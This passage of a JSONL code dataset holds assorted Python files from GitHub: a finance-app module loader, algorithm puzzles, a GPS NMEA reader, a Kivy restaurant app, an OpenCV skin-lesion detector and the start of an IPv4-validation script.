import NordnetParser\nfrom py_privatekonomi.core.config import readConfig\nfrom py_privatekonomi.core.mappers.economy_mapper import EconomyMapper\n\ndef __load_module(name, folder):\n safe_module_name = common.path_leaf(name)\n if not safe_module_name.startswith(\"py_privatekonomi.core.%s\" % folder):\n safe_module_name.replace(\".\", \"\")\n safe_module_name = \"%s.%s\" % (folder, safe_module_name)\n safe_module = importlib.import_module(\"%s\" % safe_module_name)\n return safe_module\n\ndef load_app(app_name, sources, parser_name = None, formatter_name = None, persist = False):\n _core = load_core()\n _sources = load_sources(sources)\n app = {\n 'module' : __load_module(app_name, \"apps\"),\n 'parser' : load_parser(parser_name, _core['factories']['parsers']['account_parser_factory']),\n 'formatter' : load_formatter(formatter_name, _core['factories']['formatters']['account_formatter_factory']),\n 'sources' : _sources,\n 'persist' : persist\n }\n app['core'] = _core\n return app\n\ndef load_core():\n account_formatter_factories = load_factory({\n 'swedbank' : SwedbankFormatter,\n 'avanza' : AvanzaFormatter,\n 'nordnet' : NordnetFormatter\n }, AccountFormatterFactory)\n\n account_parser_factories = load_factory({\n 'swedbank' : SwedbankParser,\n 'avanza' : AvanzaParser,\n 'nordnet' : NordnetParser\n }, AccountParserFactory)\n\n core = {\n 'factories' : {\n 'formatters' : {\n 'account_formatter_factory' : account_formatter_factories\n },\n 'parsers' : {\n 'account_parser_factory' : account_parser_factories\n }\n }\n }\n return core\n\ndef load_factory(names, factory):\n _factory = factory()\n for name in names:\n _factory.set(name, names[name])\n return _factory\n\ndef load_formatter(name, factory):\n return factory.create(name)\n\ndef load_parser(name, factory):\n return factory.create(name)\n\ndef load_sources(source_name):\n if common.is_list(source_name):\n return source_name\n if source_name.endswith(\".ini\"):\n source_name = source_name.replace(\".ini\", \"\")\n source = common.as_obj(readConfig(source_name, \"Source\"))\n if hasattr(source, 'exact_match'):\n return [source.exact_match]\n else:\n candidate_files = [f for f in os.listdir(source.dir) if os.path.isfile(os.path.join(source.dir, f))]\n if hasattr(source, 'suffix'):\n candidate_files = [x for x in candidate_files if x.endswith(source.suffix)]\n if hasattr(source, 'prefix'):\n candidate_files = [x for x in candidate_files if x.startswith(source.prefix)]\n if hasattr(source, 'filename_like'):\n candidate_files = [x for x in candidate_files if source.filename_like in x]\n files = [os.path.join(source.dir, x) for x in candidate_files]\n return files\n else:\n return [source_name]\n\ndef load_models(model_names):\n models = {}\n model_collection = [common.camelcase_to_underscore(model) for model in model_names]\n for table_name in model_collection:\n module = __load_module(table_name, \"py_privatekonomi.core.models\")\n model_name = common.underscore_to_camelcase(table_name)\n type_ = getattr(module, model_name)\n models[table_name] = {\n 'type' : type_,\n 'table_name' : table_name,\n 'model_name' : model_name\n }\n return models\n\ndef load_customizations(org_name, raw_models = None, safe=False):\n path = \"py_privatekonomi.core.customizations\"\n module = None\n if safe is True:\n try:\n module = __load_module(org_name, path)\n except ImportError:\n return {}\n if module is None:\n module = __load_module(org_name, path)\n if raw_models is None:\n raw_models = load_models(EconomyMapper.getModelNames())\n customizations = 
module.getCustomizations(raw_models)\n return customizations\n","repo_name":"nilsFK/py-privatekonomi","sub_path":"py_privatekonomi/core/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"71229838355","text":"from collections import deque\n\n\nclass NetworkFlow:\n def __init__(self, N, capacity):\n self.N = N\n self.capacity = capacity\n\n def bfs(self, flow, source, sink):\n parent = [-1 for _ in range(self.N)]\n q = deque()\n parent[source] = source\n q.append(source)\n while q and parent[sink] == -1:\n u = q.popleft()\n for v in range(self.N):\n if self.capacity[u][v] - flow[u][v] > 0 and parent[v] == -1:\n q.append(v)\n parent[v] = u\n return parent\n\n def max_flow(self, source, sink):\n flow = [[0 for _ in range(self.N)] for _ in range(self.N)]\n total_flow = 0\n while True:\n parent = self.bfs(flow, source, sink)\n if parent[sink] == -1:\n break\n amount = int(1e9)\n p = sink\n while p != source:\n amount = min(amount, self.capacity[parent[p]][p] - flow[parent[p]][p])\n p = parent[p]\n p = sink\n while p != source:\n flow[parent[p]][p] += amount\n flow[p][parent[p]] -= amount\n p = parent[p]\n total_flow += amount\n return total_flow\n","repo_name":"imhyo/codejam","sub_path":"network_flow.py","file_name":"network_flow.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"84"} +{"seq_id":"39719458133","text":"def solution(s):\n answer = []\n tmp = 0\n str = []\n t = []\n # 숫자 구분 ( \"{\" , \",\" , \"}\" 제외 시키기)\n for i in range(1, len(s)-1):\n if s[i] == \"{\":\n tmp = i+1\n continue\n elif s[i] == ',':\n continue\n elif s[i] == \"}\":\n str.append(s[tmp:i].split(\",\"))\n t.clear()\n tmp += 1\n else:\n t.append(s[i])\n # 길이로 구분\n str.sort(key=lambda x:len(x))\n len_num = len(str)\n\n # 구분된 부��에서 순서대로 위치 맞춰주기\n for i in range(len_num-1):\n for j in range(i+1):\n index = str[i + 1].index(str[j][j])\n if index == j:\n continue\n else:\n temp = str[i + 1][j]\n str[i + 1][j] = str[i + 1][index]\n str[i + 1][index] = temp\n # 가장 앞 부분만 따서 오기 \n for i in range(len_num):\n answer.append(int(str[i][i]))\n\n\n return answer\n\n# from collections import Counter\n# def solution(s):\n# new_s = [sss.replace('{','').replace('}','') for sss in s.split(',')]\n# print(Counter(new_s).items())\n# return [int(c[0]) for c in sorted(Counter(new_s).items(), key = lambda x: x[1],reverse=True )]\n\nprint(solution(\"{{1,2,3},{1,2},{4,1,2,3},{2}}\"))\n","repo_name":"Wintersoldje/Algorithm","sub_path":"Programmers/Kakao_Tuple/Programmers_Kakao_Tuple.py","file_name":"Programmers_Kakao_Tuple.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"42452605661","text":"import os\nfrom enum import Enum\nfrom ast import literal_eval\n\nclass Result(Enum):\n VALID = 1\n INVALID = 2\n UNKNOWN = 3\n\nf = open(os.path.join(os.path.dirname(__file__), \"input.txt\"))\n\ngroups = f.read().split(\"\\n\\n\")\n\ndef validate_packet(first, second):\n i = 0\n while i < min(len(first), len(second)):\n l, r = first[i], second[i]\n if type(l) == int and type(r) == int:\n if l < r:\n return Result.VALID\n if l > r:\n return Result.INVALID\n i += 1\n elif type(l) == list and type(r) == list:\n result = validate_packet(l, r)\n if result != Result.UNKNOWN:\n return result\n i += 1\n else:\n if type(l) == int:\n first[i] = 
[l]\n else:\n second[i] = [r]\n if len(first) == len(second):\n return Result.UNKNOWN\n else:\n return Result.VALID if len(first) < len(second) else Result.INVALID\n\nvalid_indices = []\nfor i, g in enumerate(groups, 1):\n first, second = g.splitlines()\n first, second = literal_eval(first), literal_eval(second)\n if validate_packet(first, second) == Result.VALID:\n valid_indices.append(i)\n\n# answer: 5717\nprint(sum(valid_indices))\n","repo_name":"feefs/ps","sub_path":"advent-of-code/2022/13/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"73231762514","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 10 21:09:09 2020\r\n\r\n@author: denis\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sb\r\nimport matplotlib.pyplot as plt\r\n\r\n# data = input('Please give the file name you wish to use: ')\r\n# data = 'GPUZSensorLog2.txt' # development data set\r\nfile_name = input('Please give the file name you wish to use: ')\r\nworkload = input('Please outline use case: ')\r\n\r\n\r\nf = open(file_name + '.txt','r+')\r\ndata = f.read()\r\n# data.encode('utf-8').strip()\r\n# f.write(data)\r\n\r\n\r\nd3 = data.encode(\"ascii\", \"ignore\")\r\ndata2 = d3.decode()\r\n\r\nf2 = open('work.txt','w')\r\nf2.write(data2)\r\nf2.close()\r\n\r\ndf = pd.read_csv('work.txt')\r\n# sb.lineplot(df.index,df[])\r\n# sb.lineplot(df.index,[df[' GPU Temperature [C] '],df[' CPU Temperature [C] ']])\r\ndf[[' GPU Temperature [C] ',' CPU Temperature [C] ']].plot()\r\nplt.ylabel('Hardware temperature')\r\nplt.title(f'{workload}')\r\nplt.legend()\r\nsb.jointplot(df[' GPU Temperature [C] '],df[' CPU Temperature [C] '],kind='hex')\r\nsb.jointplot(df[' GPU Load [%] '],df[' GPU Temperature [C] '],kind='hex')\r\nsb.jointplot(df[' GPU Load [%] '],df[' Power Consumption (W) [W] '],kind='hex')\r\n","repo_name":"BigBearZab/PC_monitoring","sub_path":"GPU-Z_quick_interpreter.py","file_name":"GPU-Z_quick_interpreter.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"5582631923","text":"from ting_file_management.file_management import txt_importer\nimport sys\n\n# from ting_file_management.queue import Queue\n\n\ndef process(path_file, instance):\n lines = txt_importer(path_file)\n data_info = {\n \"nome_do_arquivo\": path_file,\n \"qtd_linhas\": len(lines),\n \"linhas_do_arquivo\": lines,\n }\n if len(instance) > 0:\n file_is_queued = False\n for index in range(0, len(instance)):\n item = instance.search(index)\n if item[\"nome_do_arquivo\"] == data_info[\"nome_do_arquivo\"]:\n file_is_queued = True\n # como \"parar\" o for\n if not file_is_queued:\n instance.enqueue(data_info)\n else:\n instance.enqueue(data_info)\n\n sys.stdout.write(str(data_info))\n\n\ndef remove(instance):\n if len(instance) < 1:\n sys.stdout.write(\"Não há elementos\\n\")\n else:\n item = instance.search(len(instance) - 1)\n path_file = item[\"nome_do_arquivo\"]\n instance.dequeue()\n sys.stdout.write(f\"Arquivo {path_file} removido com sucesso\\n\")\n\n\ndef file_metadata(instance, position):\n try:\n item = instance.search(position)\n sys.stdout.write(str(item))\n except IndexError:\n sys.stderr.write(\"Posição 
inválida\")\n","repo_name":"flpnascto/ting","sub_path":"ting_file_management/file_process.py","file_name":"file_process.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16779041296","text":"\"\"\"\nfilename: app.py\nauthor: alexbozhinov\ncreated: 05.02.2023\npurpose: initializing the main window, initializing the app, initializing the database\n\"\"\"\n\nfrom kivy.app import App\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nimport constants\nfrom controller.employees.chefs_controller import ChefsController\nfrom controller.employees.managers_controller import ManagersController\nfrom controller.employees.waiters_controller import WaitersController\nfrom database.db import DB\nfrom view.login.login import LoginWindow\nfrom view.login.welcome import WelcomeWindow\nfrom view.main_employees_screens.chef_main_screen import ChefMainWindow\nfrom view.main_employees_screens.manager_main_screen import ManagerMainWindow\nfrom view.main_employees_screens.waiter_main_screen import WaiterMainWindow\n\nBuilder.load_file('app.kv')\n\n# database initializing\ndb = DB()\ndb.create_database()\n\n\"\"\"\nThe main window of the app, managed by kivy ScreenManager\n\"\"\"\n\n\nclass MainWindow(BoxLayout):\n chefs_controller = ChefsController()\n waiters_controller = WaitersController()\n managers_controller = ManagersController()\n\n welcome_screen = WelcomeWindow()\n login_screen = LoginWindow(chefs_controller, waiters_controller, managers_controller)\n chef_main_screen = ChefMainWindow(chefs_controller)\n waiter_main_screen = WaiterMainWindow(waiters_controller)\n manager_main_screen = ManagerMainWindow(managers_controller)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.ids.screen_welcome.add_widget(self.welcome_screen)\n self.ids.screen_login.add_widget(self.login_screen)\n self.ids.screen_chef_main.add_widget(self.chef_main_screen)\n self.ids.screen_waiter_main.add_widget(self.waiter_main_screen)\n self.ids.screen_manager_main.add_widget(self.manager_main_screen)\n\n def chef_entered(self):\n print('Chef entered')\n self.chef_main_screen.chef_entered()\n\n def waiter_entered(self):\n print('Waiter entered')\n self.waiter_main_screen.waiter_entered()\n\n def manager_entered(self):\n print('Manager entered')\n self.manager_main_screen.manager_entered()\n\n\n\"\"\"\nThe app main class\n\"\"\"\n\n\nclass RMS(App):\n images_store = constants.IMAGES_SOURCE\n\n def build(self):\n self.icon = constants.IMAGES_SOURCE + 'RMS_logo.png'\n Window.clearcolor = (240 / 255.0, 230 / 255.0, 170 / 255.0, 1)\n return MainWindow()\n\n\n# start point of the app\nif __name__ == \"__main__\":\n RMS().run()\n","repo_name":"alexbozhinov/Restaurant-Management-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27090696305","text":"from django.conf.urls import url\nfrom . 
import views\nfrom .views import PostListView\n\n\nurlpatterns = [\n # post views\n url(r'^$', views.post_list, name='post_list'),\n url(r'^tag/(?P[-\\w]+)/$', views.post_list, name='post_list_by_tag'),\n url(r'^share/(?P\\d+)/$', views.post_share, name='post_share'),\n url(r'^post/(?P.*)/$',views.post_detail,name='post_detail'),\n url(r'^search/',views.post_search,name='post_search')\n\n]\n","repo_name":"845240981/webapp","sub_path":"blog/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12079196966","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom dateutil.parser import parse\nfrom dateutil.tz import gettz\nfrom dateutil.tz import tzutc, tzlocal\nfrom queue import Queue\nfrom os import getpid\nimport numpy as np\nimport threading\nimport datetime\nimport serial\nimport time\n\nclass GPS(threading.Thread):\n\n R_EARTH = 6378137.0\n E = 0.08181919\n E_SQ = np.power(E, 2)\n LAT = 0\n LON = 1\n ALT = 2\n \n def __init__(self, serialPort, baudRate, debug=False):\n threading.Thread.__init__(self)\n self.debug = debug\n self.serialPort = serialPort\n self.baudRate = baudRate\n self.daemon = True\n self.stop = threading.Event()\n self.messageQ = Queue()\n self.commandQ = Queue()\n\n self.date = datetime.date.today()\n self.position = np.array([0, 0, 0], dtype=np.float)\n self.prevPosition = np.array([0, 0, 0], dtype=np.float)\n self.positionChanged = False\n self.timeSinceLastPositionChange = time.time()\n self.positionUpdateRate = 0\n \n self.totalDistance = np.array([[0], [0], [0]], dtype=np.float)\n self.velocity = np.array([0, 0, 0], dtype=np.float)\n self.acceleration = np.array([0, 0, 0], dtype=np.float)\n\n print(getpid(), 'Creating GPS...')\n\n def geodeticToECEF(self, position):\n\n latitude = np.deg2rad(position[self.LAT]) # phi\n longitude = np.deg2rad(position[self.LON]) # lambda\n altitude = position[self.ALT]\n\n ne = self.R_EARTH / np.sqrt(1 - self.E_SQ * np.power(np.sin(latitude), 2))\n \n return np.array([\n [(ne + altitude) * np.cos(latitude) * np.cos(longitude)],\n [(ne + altitude) * np.cos(latitude) * np.sin(longitude)],\n [(ne * (1 - self.E_SQ) + altitude) * np.sin(latitude)]\n ], dtype=np.float)\n\n def nmeaToGeodetic(self, latitude, latitudeDirection, longitude, longitudeDirection, altitude):\n\n # Convert NMEA latitude to geodetic latitude.\n latitudeHours = int(float(latitude) / 100.0)\n latitudeMinutes = (float(latitude) % 100.0) / 60.0\n correctedLatitude = latitudeHours + latitudeMinutes\n if latitudeDirection == 'S':\n correctedLatitude *= -1\n\n # Convert NMEA longitude to geodetic longitude.\n longitudeHours = int(float(longitude) / 100.0)\n longitudeMinutes = (float(longitude) % 100.0) / 60.0\n correctedLongitude = longitudeHours + longitudeMinutes\n if longitudeDirection == 'W':\n correctedLongitude *= -1\n\n # Process altitude. 
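(Editor's worked example, hypothetical\n        # numbers -- not in the original: NMEA packs degrees and minutes together, so\n        # latitude '4717.1125' means 47 deg 17.1125 min: int(4717.1125 / 100) = 47 and\n        # (4717.1125 % 100) / 60 ~= 0.2852, giving ~47.2852 decimal degrees, exactly as\n        # computed above.)\n        # 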
Result is in meters.\n correctedAltitude = float(altitude) \n\n return np.array([correctedLatitude, correctedLongitude, correctedAltitude], dtype=np.float)\n\n def getRotationMatrix(self, position):\n\n latitude = np.deg2rad(position[self.LAT]) # phi\n longitude = np.deg2rad(position[self.LON]) # lambda\n\n return np.array([\n [-np.sin(latitude) * np.cos(longitude), -np.sin(latitude) * np.sin(longitude), np.cos(latitude)],\n [-np.sin(longitude), np.cos(longitude), 0],\n [-np.cos(latitude) * np.cos(longitude), -np.cos(latitude) * np.sin(longitude), -np.sin(latitude)]\n ], dtype=np.float)\n\n def calculateBodyDynamics(self):\n \"\"\"\n self.position [lat, lon, alt]\n self.prevPosition [lat, lon, alt]\n self.timeSinceLastPositionChange [seconds]\n \"\"\"\n\n if np.linalg.norm(self.prevPosition) == 0:\n self.prevPosition = self.position.copy()\n\n prevPositionECEF = self.geodeticToECEF(self.prevPosition)\n rotationMatrix = self.getRotationMatrix(self.prevPosition)\n\n positionECEF = self.geodeticToECEF(self.position)\n\n deltaECEF = positionECEF - prevPositionECEF\n\n self.velocity = deltaECEF/self.positionUpdateRate\n self.acceleration = self.velocity/self.positionUpdateRate\n\n self.totalDistance += np.absolute(np.matmul(rotationMatrix, deltaECEF))\n\n # print('\\nNew Point: ')\n # print(np.matmul(self.rotationMatrix, deltaECEF))\n # print(deltaECEF)\n # print(self.position)\n #print(positionECEF)\n\n def processData(self, raw):\n \"\"\"\n Processes the raw data obtained by the gps serial interface. The data obtained\n consists of several message types which after being identified, must be stripped\n and parsed to obatin relevant data.\n - Time and date\n - Latitude\n - Longitude\n - Altitude\n \"\"\"\n\n # Remove new line characters, convert to utf-8 characters and split the string\n # by commas. Make sure that data was received.\n data = raw.strip().decode('utf-8', errors='ignore').split(',')\n if data:\n \n # Obtain the first column of the message to sort them out.\n messageType = data[0]\n\n # Store the rest of the payload in a separate variable.\n payload = data[1:]\n\n if messageType == '$GPGGA':\n # Latitude, longitude and altitude are obtained form this message.\n # Latitude is column 1 from payload, value must be divided by 100 to get degrees.\n # Latitude direction is column 2 from payload, value is 'S' or 'N'\n # Latitude is column 3 from payload, value must be divided by 100 to get degrees.\n # Latitude direction is column 4 from payload, value is 'W' or 'E'\n # Altitude is column 9 from payload, value is in meters.\n\n # Check that data was received.\n if all(payload[1:5]) and payload[8]:\n\n # Store current stored position as previous.\n # This will help determine if a change has occured.\n self.prevPosition = self.position.copy()\n\n # Update current position. 
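(Editor's aside, hypothetical numbers --\n                    # not in the original: for a delta of [0.001 deg, 0.001 deg, 5.0 m],\n                    # np.linalg.norm(...) ~= 5.0, so the 0.1 change threshold below is\n                    # dominated by altitude jitter rather than horizontal movement.)\n                    # 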
Gps data is in NMEA format, convert it to geodetic.\n self.position = self.nmeaToGeodetic(payload[1], payload[2], payload[3], payload[4], payload[8])\n\n # Calculate the change in position\n if np.linalg.norm(self.position - self.prevPosition) > 0.1:\n \n # Set change flag and calculate the time between position updates.\n self.positionChanged = True\n self.positionUpdateRate = time.time() - self.timeSinceLastPositionChange\n self.timeSinceLastPositionChange = time.time()\n \n\n elif messageType == '$GPRMC':\n # Time and date data is obtained from this message.\n # Time is column 0 from payload, format is HMS\n # Date is column 8 from payload, format is MDY\n \n # Check that both columns were received.\n if payload[0] and payload[8]:\n\n # Obtain the current time and date from the gps module.\n # Parse object expects first the date and then the time.\n # The time obtained by the gps is in UTC time.\n utcDate = parse('%s %s UTC' % (payload[8], payload[0]), dayfirst=True)\n \n # Convert the utc date to the local time zone in the system.\n self.date = utcDate.astimezone(tzlocal())\n\n def run(self):\n \"\"\"\n Starts the execution of the thread. Called behind the scenes when\n gps.start() is called.\n \"\"\"\n\n print(getpid(), 'Staring GPS...')\n\n # Wrapping the whole serial port inside of a try-except structure \n # for handling connection errors.\n try:\n\n # Open the serial port with a 'with' statement. This ensures that\n # the port is always closed on exit and available when the application\n # restarts.\n with serial.Serial(port=self.serialPort, baudrate=self.baudRate, timeout=1) as gps:\n \n # Check if the stop flag has been set by the parent process.\n while not self.stop.is_set():\n \n # Read a new line from the gps, timeout is 1 second.\n rawData = gps.readline()\n if rawData:\n\n # If data was obtained process it.\n self.processData(rawData)\n \n # If the position changed send updated position to queue.\n if self.positionChanged:\n self.calculateBodyDynamics()\n self.positionChanged = False\n self.messageQ.put({\n 'position': self.position,\n 'positionUpdateRate': self.positionUpdateRate,\n 'distance': self.totalDistance,\n 'date': self.date.strftime(\"%m/%d/%Y %H:%M:%S\"),\n 'velocity': self.velocity,\n 'acceleration': self.acceleration\n })\n \n # Read commands from the parent thread.\n while not self.commandQ.empty():\n self.commandQ.get()\n self.commandQ.task_done()\n\n except serial.serialutil.SerialException:\n\n # On an exception send message.\n print(getpid(), 'GPS communication can not be opened...')\n time.sleep(1)\n\n print(getpid(), 'Killing GPS...')\n\nif __name__ == '__main__':\n gps = GPS('/dev/ttyUSB0', 4800, debug=True)\n gps.start()\n while gps.isAlive():\n try:\n while not gps.messageQ.empty():\n message = gps.messageQ.get()\n gps.messageQ.task_done()\n if message:\n print('gps ->', message)\n time.sleep(0.2)\n except KeyboardInterrupt:\n break\n gps.stop.set()\n gps.join()","repo_name":"ShadoWolf4/Bachelor-Proyect","sub_path":"V.1/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1443039253","text":"from ctypes import resize\nimport os\nimport sys\nimport numpy as np\nimport cv2\nimport utils as utils\nimport facemesh as facemesh\nimport resize as resize_img\n# import src.face_type.utils as utils\n# import src.face_type.facemesh as facemesh\n\nsys.path.append('src')\nsys.path.append('src/face_type')\n\nclass Lesions:\n def 
__init__(self):\n return\n\n def lesions(self, image):\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (25, 25), 0, borderType=cv2.BORDER_ISOLATED)\n kernel = np.ones((3, 3), np.uint8)\n blur = cv2.dilate(blur, kernel)\n blur = cv2.dilate(blur, kernel)\n res = cv2.adaptiveThreshold(\n blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2\n )\n\n return res\n\n def draw(self, image, lesions, points):\n\n rect = cv2.boundingRect(points)\n\n x, y , w, h = rect\n\n H, W, C = image.shape\n\n res = image.copy()\n index_list = np.array(list(np.where(lesions==255)))\n\n for index in zip(index_list[0], index_list[1]):\n x_point = int(index[0] + y)\n y_point = int(index[1] + x)\n res[x_point, y_point, 0] = 0\n res[x_point, y_point, 1] = 255\n res[x_point, y_point, 2] = 255\n\n return res\n\n\n def lesions2(self, image, points):\n\n # 1 Crop and get average, min, max value\n # 2 Color Balancing\n # 3 Normalization of a*\n # res2 = utils.color_balancing(image, points)\n res3 = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n min_a, max_a, avg_a = utils.get_mean_from_masked_image( res3[:, :, 1], points)\n _, max_L, avg_L = utils.get_mean_from_masked_image( res3[:, :, 0], points)\n\n if max_a > 140 and (max_a - min_a) >= 10 and (max_a - avg_a) >= 7:\n kernel = np.ones((3, 3), np.uint8)\n res3 = utils.crop_image(res3, points)\n\n alpha = res3[:, :, 1]\n mask=cv2.inRange(alpha,0,8)\n alpha[mask==255]=min_a\n # alpha[mask==255]=avg_a\n\n alpha = cv2.GaussianBlur(alpha, (5,5), 0)\n alpha = cv2.normalize(alpha, None, 0, 255, cv2.NORM_MINMAX)\n # res5, ma = utils.estimation_of_AC(alpha, 255)\n mA = alpha / 255 \n _, res5 = cv2.threshold(mA, 0.6, 255, cv2.THRESH_BINARY)\n # res5 = cv2.blur(res5, (9,9))\n\n res5 = cv2.dilate(res5, kernel, iterations=2) #// make dilation image\n res5 = cv2.erode(res5, kernel, iterations=2)\n\n # res6 = utils.morphology(res5)\n res6 = cv2.GaussianBlur(res5, (5,5), 0)\n\n ret, res = cv2.threshold(res6, 100, 255, cv2.THRESH_BINARY)\n\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9,9)))\n res = cv2.dilate(res, kernel, iterations=2) #// make dilation image\n res = cv2.erode(res, kernel, iterations=2)\n\n return res\n return None\n\n \n def draw2(self, image, re_image, acnes, points, re_points):\n\n if acnes is None:\n return image\n\n rect = cv2.boundingRect(points)\n re_rect = cv2.boundingRect(re_points)\n x, y, w, h = rect\n _x, _y, _w, _h = re_rect\n H, W, C = image.shape\n _H, _W, _C = re_image.shape\n mask = np.zeros((H, W, 3), dtype=np.uint8)\n\n acnes = acnes.astype(np.uint8)\n\n temp = image.copy()\n contours, hirerarchy = cv2.findContours(acnes, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for contour in contours:\n contour = contour.astype('float32')\n contour /= [_w, _h]\n contour *= [w, h]\n contour += [x, y]\n contour = contour.astype('int32')\n area = cv2.contourArea(contour)\n # contour *= [x, y]\n if area > 180 and area < 800:\n # print(area)\n cv2.drawContours(temp, [contour], -1, (0,255,255), -1)\n # cv2.drawContours(temp, [contour], -1, (0,255,255), -1)\n\n return temp\n\n\n def crop(self, image, points):\n res = utils.crop_image(image, points, \"white\")\n return 255 - res\n\n def run(self, fm, image):\n\n re_image, _, _ = resize_img.run(fm, image, 1000)\n\n H, W, C = image.shape\n h, w, c = re_image.shape\n fm.set_points_loc(w=W, h=H)\n\n res = image.copy()\n face_cheek_right_point = np.array(fm.points_loc[\"face_cheek_right_point\"], dtype=np.int)\n face_cheek_left_point = 
np.array(fm.points_loc[\"face_cheek_left_point\"], dtype=np.int)\n face_forehead_point = np.array(fm.points_loc[\"face_forehead_point\"], dtype=np.int)\n face_chin_point = np.array(fm.points_loc[\"face_chin_point\"], dtype=np.int)\n # face_nose_point = np.array(fm.points_loc[\"face_nose_point\"], dtype=np.int)\n\n fm.set_points_loc(w=w, h=h)\n re_face_cheek_right_point = np.array(fm.points_loc[\"face_cheek_right_point\"], dtype=np.int)\n re_face_cheek_left_point = np.array(fm.points_loc[\"face_cheek_left_point\"], dtype=np.int)\n re_face_forehead_point = np.array(fm.points_loc[\"face_forehead_point\"], dtype=np.int)\n re_face_chin_point = np.array(fm.points_loc[\"face_chin_point\"], dtype=np.int)\n # re_face_nose_point = np.array(fm.points_loc[\"face_nose_point\"], dtype=np.int)\n\n lesions_img = self.lesions(image)\n # cheek_right = self.lesions(re_image, re_face_cheek_right_point)\n # cheek_left = self.lesions(re_image, re_face_cheek_left_point)\n # chin = self.lesions(re_image, re_face_chin_point)\n forehead = self.lesions2(re_image, re_face_forehead_point)\n # nose = self.lesions3(re_image, re_face_nose_point)\n\n cheek_right = self.crop(lesions_img, face_cheek_right_point)\n cheek_left = self.crop(lesions_img, face_cheek_left_point)\n chin = self.crop(lesions_img, face_chin_point)\n # nose = self.crop(lesions_img, face_nose_point)\n # forehead = self.crop(lesions_img, face_forehead_point)\n\n # lesions_img = self.lesions3(re_image)\n\n # cheek_right = self.crop(lesions_img, re_face_cheek_right_point)\n # cheek_left = self.crop(lesions_img, re_face_cheek_left_point)\n # forehead = self.crop(lesions_img, re_face_forehead_point)\n # chin = self.crop(lesions_img, re_face_chin_point)\n # nose = self.crop(lesions_img, re_face_nose_point)\n\n res = self.draw(image, cheek_right, face_cheek_right_point)\n res = self.draw(res, cheek_left , face_cheek_left_point)\n res = self.draw(res, chin , face_chin_point)\n res = self.draw2(res, re_image, forehead , face_forehead_point, re_face_forehead_point)\n # res = self.draw(res, re_image, nose , face_nose_point, re_face_nose_point)\n\n return res\n\n\n\nif __name__ == \"__main__\":\n\n faceMesh = facemesh.FaceMesh(thickness=5)\n faceMesh.set_label(\n [\n \"face_flushing_right_point\",\n \"face_flushing_left_point\",\n \"face_cheek_right_point\",\n \"face_cheek_left_point\",\n \"face_forehead_point\",\n \"face_chin_point\",\n \"face_nose_point\",\n ]\n )\n\n path = \"Test/\"\n filelist = os.listdir(path)\n\n lesions = Lesions()\n\n print(filelist)\n # filelist = ['input_46e4f730c0.jpg', 'input_0a51f37a14.jpg', 'input_0a2cff1ee6.jpg', 'input_0b8f0af0dc.jpg']\n for filename in filelist[:]:\n if filename.split(\".\")[-1] == \"jpg\":\n print(path+filename)\n image = cv2.imread(path + filename)\n res = lesions.run(faceMesh, image)\n merged = np.hstack((image, res))\n cv2.imwrite(path+filename.split(\".\")[0]+\"_lesions3.png\", merged)\n # cv2.imshow(\"res\", merged)\n # cv2.waitKey(0)\n","repo_name":"cris-j-dev/Skincare","sub_path":"src/face_type/lesions.py","file_name":"lesions.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41764533325","text":"#!/usr/bin/python3\n\n'''\nMade by DevStorm Founder\n'''\n\n\nimport socket\n\n\ndef is_valid_ipv4(ip):\n parts = ip.split(\".\")\n if len(parts) != 4:\n return False\n for part in parts:\n try:\n number = int(part)\n except ValueError:\n return False\n if number < 0 or number > 255:\n return False\n return 
